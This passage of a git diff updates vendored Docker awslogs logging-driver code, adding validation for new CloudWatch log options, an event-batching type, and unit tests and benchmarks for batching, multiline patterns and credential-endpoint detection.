+// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-datetime-format,
+// awslogs-multiline-pattern
 func ValidateLogOpt(cfg map[string]string) error {
 	for key := range cfg {
 		switch key {
 		case logGroupKey:
 		case logStreamKey:
+		case logCreateGroupKey:
 		case regionKey:
 		case tagKey:
+		case datetimeFormatKey:
+		case multilinePatternKey:
+		case credentialsEndpointKey:
 		default:
 			return fmt.Errorf("unknown log opt '%s' for %s log driver", key, name)
 		}
@@ -364,6 +627,16 @@ func ValidateLogOpt(cfg map[string]string) error {
 	if cfg[logGroupKey] == "" {
 		return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey)
 	}
+	if cfg[logCreateGroupKey] != "" {
+		if _, err := strconv.ParseBool(cfg[logCreateGroupKey]); err != nil {
+			return fmt.Errorf("must specify valid value for log opt '%s': %v", logCreateGroupKey, err)
+		}
+	}
+	_, datetimeFormatKeyExists := cfg[datetimeFormatKey]
+	_, multilinePatternKeyExists := cfg[multilinePatternKey]
+	if datetimeFormatKeyExists && multilinePatternKeyExists {
+		return fmt.Errorf("you cannot configure log opt '%s' and '%s' at the same time", datetimeFormatKey, multilinePatternKey)
+	}
 	return nil
 }
 
@@ -396,9 +669,76 @@ func (slice byTimestamp) Swap(i, j int) {
 }
 
 func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent {
-	cwEvents := []*cloudwatchlogs.InputLogEvent{}
-	for _, input := range events {
-		cwEvents = append(cwEvents, input.inputLogEvent)
+	cwEvents := make([]*cloudwatchlogs.InputLogEvent, len(events))
+	for i, input := range events {
+		cwEvents[i] = input.inputLogEvent
 	}
 	return cwEvents
 }
+
+func newEventBatch() *eventBatch {
+	return &eventBatch{
+		batch: make([]wrappedEvent, 0),
+		bytes: 0,
+	}
+}
+
+// events returns a slice of wrappedEvents sorted in order of their
+// timestamps and then by their insertion order (see `byTimestamp`).
+//
+// Warning: this method is not threadsafe and must not be used
+// concurrently.
+func (b *eventBatch) events() []wrappedEvent {
+	sort.Sort(byTimestamp(b.batch))
+	return b.batch
+}
+
+// add adds an event to the batch of events accounting for the
+// necessary overhead for an event to be logged. An error will be
+// returned if the event cannot be added to the batch due to service
+// limits.
+//
+// Warning: this method is not threadsafe and must not be used
+// concurrently.
+func (b *eventBatch) add(event wrappedEvent, size int) bool {
+	addBytes := size + perEventBytes
+
+	// verify we are still within service limits
+	switch {
+	case len(b.batch)+1 > maximumLogEventsPerPut:
+		return false
+	case b.bytes+addBytes > maximumBytesPerPut:
+		return false
+	}
+
+	b.bytes += addBytes
+	b.batch = append(b.batch, event)
+
+	return true
+}
+
+// count is the number of batched events.  Warning: this method
+// is not threadsafe and must not be used concurrently.
+func (b *eventBatch) count() int {
+	return len(b.batch)
+}
+
+// size is the total number of bytes that the batch represents.
+//
+// Warning: this method is not threadsafe and must not be used
+// concurrently.
+func (b *eventBatch) size() int {
+	return b.bytes
+}
+
+func (b *eventBatch) isEmpty() bool {
+	zeroEvents := b.count() == 0
+	zeroSize := b.size() == 0
+	return zeroEvents && zeroSize
+}
+
+// reset prepares the batch for reuse.
+func (b *eventBatch) reset() {
+	b.bytes = 0
+	b.batch = b.batch[:0]
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
index d5b1aaef52..6955d910c3 100644
--- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go
@@ -1,10 +1,14 @@
-package awslogs
+package awslogs // import "github.com/docker/docker/daemon/logger/awslogs"
 
 import (
 	"errors"
 	"fmt"
+	"io/ioutil"
 	"net/http"
+	"net/http/httptest"
+	"os"
 	"reflect"
+	"regexp"
 	"runtime"
 	"strings"
 	"testing"
@@ -17,6 +21,8 @@ import (
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
 	"github.com/docker/docker/dockerversion"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 const (
@@ -24,17 +30,43 @@ const (
 	streamName        = "streamName"
 	sequenceToken     = "sequenceToken"
 	nextSequenceToken = "nextSequenceToken"
-	logline           = "this is a log line"
+	logline           = "this is a log line\r"
+	multilineLogline  = "2017-01-01 01:01:44 This is a multiline log entry\r"
 )
 
+// Generates i multi-line events each with j lines
+func (l *logStream) logGenerator(lineCount int, multilineCount int) {
+	for i := 0; i < multilineCount; i++ {
+		l.Log(&logger.Message{
+			Line:      []byte(multilineLogline),
+			Timestamp: time.Time{},
+		})
+		for j := 0; j < lineCount; j++ {
+			l.Log(&logger.Message{
+				Line:      []byte(logline),
+				Timestamp: time.Time{},
+			})
+		}
+	}
+}
+
+func testEventBatch(events []wrappedEvent) *eventBatch {
+	batch := newEventBatch()
+	for _, event := range events {
+		eventlen := len([]byte(*event.inputLogEvent.Message))
+		batch.add(event, eventlen)
+	}
+	return batch
+}
+
 func TestNewAWSLogsClientUserAgentHandler(t *testing.T) {
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{
 			regionKey: "us-east-1",
 		},
 	}
 
-	client, err := newAWSLogsClient(ctx)
+	client, err := newAWSLogsClient(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -59,7 +91,7 @@ func TestNewAWSLogsClientUserAgentHandler(t *testing.T) {
 }
 
 func TestNewAWSLogsClientRegionDetect(t *testing.T) {
-	ctx := logger.Context{
+	info := logger.Info{
 		Config: map[string]string{},
 	}
 
@@ -71,7 +103,7 @@ func TestNewAWSLogsClientRegionDetect(t *testing.T) {
 		successResult: "us-east-1",
 	}
 
-	_, err := newAWSLogsClient(ctx)
+	_, err := newAWSLogsClient(info)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -99,8 +131,39 @@ func TestCreateSuccess(t *testing.T) {
 		t.Errorf("Expected LogGroupName to be %s", groupName)
 	}
 	if argument.LogStreamName == nil {
+		t.Fatal("Expected non-nil LogStreamName")
+	}
+	if *argument.LogStreamName != streamName {
+		t.Errorf("Expected LogStreamName to be %s", streamName)
+	}
+}
+
+func TestCreateLogGroupSuccess(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:         mockClient,
+		logGroupName:   groupName,
+		logStreamName:  streamName,
+		logCreateGroup: true,
+	}
+	mockClient.createLogGroupResult <- &createLogGroupResult{}
+	mockClient.createLogStreamResult <- &createLogStreamResult{}
+
+	err := stream.create()
+
+	if err != nil {
+		t.Errorf("Received unexpected err: %v\n", err)
+	}
+	argument := <-mockClient.createLogStreamArgument
+	if argument.LogGroupName == nil {
 		t.Fatal("Expected non-nil LogGroupName")
 	}
+	if *argument.LogGroupName != groupName {
+		t.Errorf("Expected LogGroupName to be %s", groupName)
+	}
+	if argument.LogStreamName == nil {
+		t.Fatal("Expected non-nil LogStreamName")
+	}
 	if *argument.LogStreamName != streamName {
 		t.Errorf("Expected LogStreamName to be %s", streamName)
 	}
@@ -112,7 +175,7 @@ func TestCreateError(t *testing.T) {
 		client: mockClient,
 	}
 	mockClient.createLogStreamResult <- &createLogStreamResult{
-		errorResult: errors.New("Error!"),
+		errorResult: errors.New("Error"),
 	}
 
 	err := stream.create()
@@ -138,6 +201,93 @@ func TestCreateAlreadyExists(t *testing.T) {
 	}
 }
 
+func TestLogClosed(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client: mockClient,
+		closed: true,
+	}
+	err := stream.Log(&logger.Message{})
+	if err == nil {
+		t.Fatal("Expected non-nil error")
+	}
+}
+
+func TestLogBlocking(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:   mockClient,
+		messages: make(chan *logger.Message),
+	}
+
+	errorCh := make(chan error, 1)
+	started := make(chan bool)
+	go func() {
+		started <- true
+		err := stream.Log(&logger.Message{})
+		errorCh <- err
+	}()
+	<-started
+	select {
+	case err := <-errorCh:
+		t.Fatal("Expected stream.Log to block: ", err)
+	default:
+		break
+	}
+	select {
+	case <-stream.messages:
+		break
+	default:
+		t.Fatal("Expected to be able to read from stream.messages but was unable to")
+	}
+	select {
+	case err := <-errorCh:
+		if err != nil {
+			t.Fatal(err)
+		}
+	case <-time.After(30 * time.Second):
+		t.Fatal("timed out waiting for read")
+	}
+}
+
+func TestLogNonBlockingBufferEmpty(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:         mockClient,
+		messages:       make(chan *logger.Message, 1),
+		logNonBlocking: true,
+	}
+	err := stream.Log(&logger.Message{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestLogNonBlockingBufferFull(t *testing.T) {
+	mockClient := newMockClient()
+	stream := &logStream{
+		client:         mockClient,
+		messages:       make(chan *logger.Message, 1),
+		logNonBlocking: true,
+	}
+	stream.messages <- &logger.Message{}
+	errorCh := make(chan error)
+	started := make(chan bool)
+	go func() {
+		started <- true
+		err := stream.Log(&logger.Message{})
+		errorCh <- err
+	}()
+	<-started
+	select {
+	case err := <-errorCh:
+		if err == nil {
+			t.Fatal("Expected non-nil error")
+		}
+	case <-time.After(30 * time.Second):
+		t.Fatal("Expected Log call to not block")
+	}
+}
 func TestPublishBatchSuccess(t *testing.T) {
 	mockClient := newMockClient()
 	stream := &logStream{
@@ -159,7 +309,7 @@ func TestPublishBatchSuccess(t *testing.T) {
 		},
 	}
 
-	stream.publishBatch(events)
+	stream.publishBatch(testEventBatch(events))
 	if stream.sequenceToken == nil {
 		t.Fatal("Expected non-nil sequenceToken")
 	}
@@ -193,7 +343,7 @@ func TestPublishBatchError(t *testing.T) {
 		sequenceToken: aws.String(sequenceToken),
 	}
 	mockClient.putLogEventsResult <- &putLogEventsResult{
-		errorResult: errors.New("Error!"),
+		errorResult: errors.New("Error"),
 	}
 
 	events := []wrappedEvent{
@@ -204,7 +354,7 @@ func TestPublishBatchError(t *testing.T) {
 		},
 	}
 
-	stream.publishBatch(events)
+	stream.publishBatch(testEventBatch(events))
 	if stream.sequenceToken == nil {
 		t.Fatal("Expected non-nil sequenceToken")
 	}
@@ -238,7 +388,7 @@ func TestPublishBatchInvalidSeqSuccess(t *testing.T) {
 		},
 	}
 
-	stream.publishBatch(events)
+	stream.publishBatch(testEventBatch(events))
 	if stream.sequenceToken == nil {
 		t.Fatal("Expected non-nil sequenceToken")
 	}
@@ -301,7 +451,7 @@ func TestPublishBatchAlreadyAccepted(t *testing.T) {
 		},
 	}
 
-	stream.publishBatch(events)
+	stream.publishBatch(testEventBatch(events))
 	if stream.sequenceToken == nil {
 		t.Fatal("Expected non-nil sequenceToken")
 	}
@@ -347,8 +497,9 @@ func TestCollectBatchSimple(t *testing.T) {
 			C: ticks,
 		}
 	}
-
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
 	stream.Log(&logger.Message{
 		Line:      []byte(logline),
@@ -391,7 +542,9 @@ func TestCollectBatchTicker(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
 	stream.Log(&logger.Message{
 		Line:      []byte(logline + " 1"),
@@ -440,6 +593,295 @@ func TestCollectBatchTicker(t *testing.T) {
 
 }
 
+func TestCollectBatchMultilinePattern(t *testing.T) {
+	mockClient := newMockClient()
+	multilinePattern := regexp.MustCompile("xxxx")
+	stream := &logStream{
+		client:           mockClient,
+		logGroupName:     groupName,
+		logStreamName:    streamName,
+		multilinePattern: multilinePattern,
+		sequenceToken:    aws.String(sequenceToken),
+		messages:         make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now(),
+	})
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now(),
+	})
+	stream.Log(&logger.Message{
+		Line:      []byte("xxxx " + logline),
+		Timestamp: time.Now(),
+	})
+
+	ticks <- time.Now()
+
+	// Verify single multiline event
+	argument := <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event")
+	assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message")
+
+	stream.Close()
+
+	// Verify single event
+	argument = <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event")
+	assert.Check(t, is.Equal("xxxx "+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message")
+}
+
+func BenchmarkCollectBatch(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		mockClient := newMockClient()
+		stream := &logStream{
+			client:        mockClient,
+			logGroupName:  groupName,
+			logStreamName: streamName,
+			sequenceToken: aws.String(sequenceToken),
+			messages:      make(chan *logger.Message),
+		}
+		mockClient.putLogEventsResult <- &putLogEventsResult{
+			successResult: &cloudwatchlogs.PutLogEventsOutput{
+				NextSequenceToken: aws.String(nextSequenceToken),
+			},
+		}
+		ticks := make(chan time.Time)
+		newTicker = func(_ time.Duration) *time.Ticker {
+			return &time.Ticker{
+				C: ticks,
+			}
+		}
+
+		d := make(chan bool)
+		close(d)
+		go stream.collectBatch(d)
+		stream.logGenerator(10, 100)
+		ticks <- time.Time{}
+		stream.Close()
+	}
+}
+
+func BenchmarkCollectBatchMultilinePattern(b *testing.B) {
+	for i := 0; i < b.N; i++ {
+		mockClient := newMockClient()
+		multilinePattern := regexp.MustCompile(`\d{4}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[1,2][0-9]|3[0,1]) (?:[0,1][0-9]|2[0-3]):[0-5][0-9]:[0-5][0-9]`)
+		stream := &logStream{
+			client:           mockClient,
+			logGroupName:     groupName,
+			logStreamName:    streamName,
+			multilinePattern: multilinePattern,
+			sequenceToken:    aws.String(sequenceToken),
+			messages:         make(chan *logger.Message),
+		}
+		mockClient.putLogEventsResult <- &putLogEventsResult{
+			successResult: &cloudwatchlogs.PutLogEventsOutput{
+				NextSequenceToken: aws.String(nextSequenceToken),
+			},
+		}
+		ticks := make(chan time.Time)
+		newTicker = func(_ time.Duration) *time.Ticker {
+			return &time.Ticker{
+				C: ticks,
+			}
+		}
+		d := make(chan bool)
+		close(d)
+		go stream.collectBatch(d)
+		stream.logGenerator(10, 100)
+		ticks <- time.Time{}
+		stream.Close()
+	}
+}
+
+func TestCollectBatchMultilinePatternMaxEventAge(t *testing.T) {
+	mockClient := newMockClient()
+	multilinePattern := regexp.MustCompile("xxxx")
+	stream := &logStream{
+		client:           mockClient,
+		logGroupName:     groupName,
+		logStreamName:    streamName,
+		multilinePattern: multilinePattern,
+		sequenceToken:    aws.String(sequenceToken),
+		messages:         make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now(),
+	})
+
+	// Log an event 1 second later
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now().Add(time.Second),
+	})
+
+	// Fire ticker batchPublishFrequency seconds later
+	ticks <- time.Now().Add(batchPublishFrequency + time.Second)
+
+	// Verify single multiline event is flushed after maximum event buffer age (batchPublishFrequency)
+	argument := <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event")
+	assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message")
+
+	// Log an event 1 second later
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now().Add(time.Second),
+	})
+
+	// Fire ticker another batchPublishFrequency seconds later
+	ticks <- time.Now().Add(2*batchPublishFrequency + time.Second)
+
+	// Verify the event buffer is truly flushed - we should only receive a single event
+	argument = <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event")
+	assert.Check(t, is.Equal(logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message")
+	stream.Close()
+}
+
+func TestCollectBatchMultilinePatternNegativeEventAge(t *testing.T) {
+	mockClient := newMockClient()
+	multilinePattern := regexp.MustCompile("xxxx")
+	stream := &logStream{
+		client:           mockClient,
+		logGroupName:     groupName,
+		logStreamName:    streamName,
+		multilinePattern: multilinePattern,
+		sequenceToken:    aws.String(sequenceToken),
+		messages:         make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
+
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now(),
+	})
+
+	// Log an event 1 second later
+	stream.Log(&logger.Message{
+		Line:      []byte(logline),
+		Timestamp: time.Now().Add(time.Second),
+	})
+
+	// Fire ticker in past to simulate negative event buffer age
+	ticks <- time.Now().Add(-time.Second)
+
+	// Verify single multiline event is flushed with a negative event buffer age
+	argument := <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(1, len(argument.LogEvents)), "Expected single multiline event")
+	assert.Check(t, is.Equal(logline+"\n"+logline+"\n", *argument.LogEvents[0].Message), "Received incorrect multiline message")
+
+	stream.Close()
+}
+
+func TestCollectBatchMultilinePatternMaxEventSize(t *testing.T) {
+	mockClient := newMockClient()
+	multilinePattern := regexp.MustCompile("xxxx")
+	stream := &logStream{
+		client:           mockClient,
+		logGroupName:     groupName,
+		logStreamName:    streamName,
+		multilinePattern: multilinePattern,
+		sequenceToken:    aws.String(sequenceToken),
+		messages:         make(chan *logger.Message),
+	}
+	mockClient.putLogEventsResult <- &putLogEventsResult{
+		successResult: &cloudwatchlogs.PutLogEventsOutput{
+			NextSequenceToken: aws.String(nextSequenceToken),
+		},
+	}
+	ticks := make(chan time.Time)
+	newTicker = func(_ time.Duration) *time.Ticker {
+		return &time.Ticker{
+			C: ticks,
+		}
+	}
+
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
+
+	// Log max event size
+	longline := strings.Repeat("A", maximumBytesPerEvent)
+	stream.Log(&logger.Message{
+		Line:      []byte(longline),
+		Timestamp: time.Now(),
+	})
+
+	// Log short event
+	shortline := strings.Repeat("B", 100)
+	stream.Log(&logger.Message{
+		Line:      []byte(shortline),
+		Timestamp: time.Now(),
+	})
+
+	// Fire ticker
+	ticks <- time.Now().Add(batchPublishFrequency)
+
+	// Verify multiline events
+	// We expect a maximum sized event with no new line characters and a
+	// second short event with a new line character at the end
+	argument := <-mockClient.putLogEventsArgument
+	assert.Check(t, argument != nil, "Expected non-nil PutLogEventsInput")
+	assert.Check(t, is.Equal(2, len(argument.LogEvents)), "Expected two events")
+	assert.Check(t, is.Equal(longline, *argument.LogEvents[0].Message), "Received incorrect multiline message")
+	assert.Check(t, is.Equal(shortline+"\n", *argument.LogEvents[1].Message), "Received incorrect multiline message")
+	stream.Close()
+}
+
 func TestCollectBatchClose(t *testing.T) {
 	mockClient := newMockClient()
 	stream := &logStream{
@@ -461,7 +903,9 @@ func TestCollectBatchClose(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
 	stream.Log(&logger.Message{
 		Line:      []byte(logline),
@@ -504,7 +948,9 @@ func TestCollectBatchLineSplit(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
 	longline := strings.Repeat("A", maximumBytesPerEvent)
 	stream.Log(&logger.Message{
@@ -551,7 +997,9 @@ func TestCollectBatchMaxEvents(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
 	line := "A"
 	for i := 0; i <= maximumLogEventsPerPut; i++ {
@@ -582,7 +1030,8 @@ func TestCollectBatchMaxEvents(t *testing.T) {
 }
 
 func TestCollectBatchMaxTotalBytes(t *testing.T) {
-	mockClient := newMockClientBuffered(1)
+	expectedPuts := 2
+	mockClient := newMockClientBuffered(expectedPuts)
 	stream := &logStream{
 		client:        mockClient,
 		logGroupName:  groupName,
@@ -590,11 +1039,14 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) {
 		sequenceToken: aws.String(sequenceToken),
 		messages:      make(chan *logger.Message),
 	}
-	mockClient.putLogEventsResult <- &putLogEventsResult{
-		successResult: &cloudwatchlogs.PutLogEventsOutput{
-			NextSequenceToken: aws.String(nextSequenceToken),
-		},
+	for i := 0; i < expectedPuts; i++ {
+		mockClient.putLogEventsResult <- &putLogEventsResult{
+			successResult: &cloudwatchlogs.PutLogEventsOutput{
+				NextSequenceToken: aws.String(nextSequenceToken),
+			},
+		}
 	}
+
 	var ticks = make(chan time.Time)
 	newTicker = func(_ time.Duration) *time.Ticker {
 		return &time.Ticker{
@@ -602,34 +1054,61 @@ func TestCollectBatchMaxTotalBytes(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
-	longline := strings.Repeat("A", maximumBytesPerPut)
+	numPayloads := maximumBytesPerPut / (maximumBytesPerEvent + perEventBytes)
+	// maxline is the maximum line that could be submitted after
+	// accounting for its overhead.
+	maxline := strings.Repeat("A", maximumBytesPerPut-(perEventBytes*numPayloads))
+	// This will be split and batched up to the `maximumBytesPerPut'
+	// (+/- `maximumBytesPerEvent'). This /should/ be aligned, but
+	// should also tolerate an offset within that range.
 	stream.Log(&logger.Message{
-		Line:      []byte(longline + "B"),
+		Line:      []byte(maxline[:len(maxline)/2]),
+		Timestamp: time.Time{},
+	})
+	stream.Log(&logger.Message{
+		Line:      []byte(maxline[len(maxline)/2:]),
+		Timestamp: time.Time{},
+	})
+	stream.Log(&logger.Message{
+		Line:      []byte("B"),
 		Timestamp: time.Time{},
 	})
 
-	// no ticks
+	// no ticks, guarantee batch by size (and chan close)
 	stream.Close()
 
 	argument := <-mockClient.putLogEventsArgument
 	if argument == nil {
 		t.Fatal("Expected non-nil PutLogEventsInput")
 	}
-	bytes := 0
+
+	// Should total to the maximum allowed bytes.
+	eventBytes := 0
 	for _, event := range argument.LogEvents {
-		bytes += len(*event.Message)
+		eventBytes += len(*event.Message)
+	}
+	eventsOverhead := len(argument.LogEvents) * perEventBytes
+	payloadTotal := eventBytes + eventsOverhead
+	// lowestMaxBatch allows the payload to be offset if the messages
+	// don't lend themselves to align with the maximum event size.
+	lowestMaxBatch := maximumBytesPerPut - maximumBytesPerEvent
+
+	if payloadTotal > maximumBytesPerPut {
+		t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, payloadTotal)
 	}
-	if bytes > maximumBytesPerPut {
-		t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes)
+	if payloadTotal < lowestMaxBatch {
+		t.Errorf("Batch to be no less than %d but was %d", lowestMaxBatch, payloadTotal)
 	}
 
 	argument = <-mockClient.putLogEventsArgument
 	if len(argument.LogEvents) != 1 {
 		t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents))
 	}
-	message := *argument.LogEvents[0].Message
+	message := *argument.LogEvents[len(argument.LogEvents)-1].Message
 	if message[len(message)-1:] != "B" {
 		t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:])
 	}
@@ -656,10 +1135,12 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) {
 		}
 	}
 
-	go stream.collectBatch()
+	d := make(chan bool)
+	close(d)
+	go stream.collectBatch(d)
 
+	var expectedEvents []*cloudwatchlogs.InputLogEvent
 	times := maximumLogEventsPerPut
-	expectedEvents := []*cloudwatchlogs.InputLogEvent{}
 	timestamp := time.Now()
 	for i := 0; i < times; i++ {
 		line := fmt.Sprintf("%d", i)
@@ -693,14 +1174,66 @@ func TestCollectBatchWithDuplicateTimestamps(t *testing.T) {
 	}
 }
 
+func TestParseLogOptionsMultilinePattern(t *testing.T) {
+	info := logger.Info{
+		Config: map[string]string{
+			multilinePatternKey: "^xxxx",
+		},
+	}
+
+	multilinePattern, err := parseMultilineOptions(info)
+	assert.Check(t, err, "Received unexpected error")
+	assert.Check(t, multilinePattern.MatchString("xxxx"), "No multiline pattern match found")
+}
+
+func TestParseLogOptionsDatetimeFormat(t *testing.T) {
+	datetimeFormatTests := []struct {
+		format string
+		match  string
+	}{
+		{"%d/%m/%y %a %H:%M:%S%L %Z", "31/12/10 Mon 08:42:44.345 NZDT"},
+		{"%Y-%m-%d %A %I:%M:%S.%f%p%z", "2007-12-04 Monday 08:42:44.123456AM+1200"},
+		{"%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b|%b", "Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec"},
+		{"%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B|%B", "January|February|March|April|May|June|July|August|September|October|November|December"},
+		{"%A|%A|%A|%A|%A|%A|%A", "Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday"},
+		{"%a|%a|%a|%a|%a|%a|%a", "Mon|Tue|Wed|Thu|Fri|Sat|Sun"},
+		{"Day of the week: %w, Day of the year: %j", "Day of the week: 4, Day of the year: 091"},
+	}
+	for _, dt := range datetimeFormatTests {
+		t.Run(dt.match, func(t *testing.T) {
+			info := logger.Info{
+				Config: map[string]string{
+					datetimeFormatKey: dt.format,
+				},
+			}
+			multilinePattern, err := parseMultilineOptions(info)
+			assert.Check(t, err, "Received unexpected error")
+			assert.Check(t, multilinePattern.MatchString(dt.match), "No multiline pattern match found")
+		})
+	}
+}
+
+func TestValidateLogOptionsDatetimeFormatAndMultilinePattern(t *testing.T) {
+	cfg := map[string]string{
+		multilinePatternKey: "^xxxx",
+		datetimeFormatKey:   "%Y-%m-%d",
+		logGroupKey:         groupName,
+	}
+	conflictingLogOptionsError := "you cannot configure log opt 'awslogs-datetime-format' and 'awslogs-multiline-pattern' at the same time"
+
+	err := ValidateLogOpt(cfg)
+	assert.Check(t, err != nil, "Expected an error")
+	assert.Check(t, is.Equal(err.Error(), conflictingLogOptionsError), "Received invalid error")
+}
+
 func TestCreateTagSuccess(t *testing.T) {
 	mockClient := newMockClient()
-	ctx := logger.Context{
+	info := logger.Info{
 		ContainerName: "/test-container",
 		ContainerID:   "container-abcdefghijklmnopqrstuvwxyz01234567890",
 		Config:        map[string]string{"tag": "{{.Name}}/{{.FullID}}"},
 	}
-	logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	logStreamName, e := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 	if e != nil {
 		t.Errorf("Error generating tag: %q", e)
 	}
@@ -722,3 +1255,137 @@ func TestCreateTagSuccess(t *testing.T) {
 		t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890")
 	}
 }
+
+func BenchmarkUnwrapEvents(b *testing.B) {
+	events := make([]wrappedEvent, maximumLogEventsPerPut)
+	for i := 0; i < maximumLogEventsPerPut; i++ {
+		mes := strings.Repeat("0", maximumBytesPerEvent)
+		events[i].inputLogEvent = &cloudwatchlogs.InputLogEvent{
+			Message: &mes,
+		}
+	}
+
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		res := unwrapEvents(events)
+		assert.Check(b, is.Len(res, maximumLogEventsPerPut))
+	}
+}
+
+func TestNewAWSLogsClientCredentialEndpointDetect(t *testing.T) {
+	// required for the cloudwatchlogs client
+	os.Setenv("AWS_REGION", "us-west-2")
+	defer os.Unsetenv("AWS_REGION")
+
+	credsResp := `{
+		"AccessKeyId" :    "test-access-key-id",
+		"SecretAccessKey": "test-secret-access-key"
+		}`
+
+	expectedAccessKeyID := "test-access-key-id"
+	expectedSecretAccessKey := "test-secret-access-key"
+
+	testServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		fmt.Fprintln(w, credsResp)
+	}))
+	defer testServer.Close()
+
+	// set the SDKEndpoint in the driver
+	newSDKEndpoint = testServer.URL
+
+	info := logger.Info{
+		Config: map[string]string{},
+	}
+
+	info.Config["awslogs-credentials-endpoint"] = "/creds"
+
+	c, err := newAWSLogsClient(info)
+	assert.Check(t, err)
+
+	client := c.(*cloudwatchlogs.CloudWatchLogs)
+
+	creds, err := client.Config.Credentials.Get()
+	assert.Check(t, err)
+
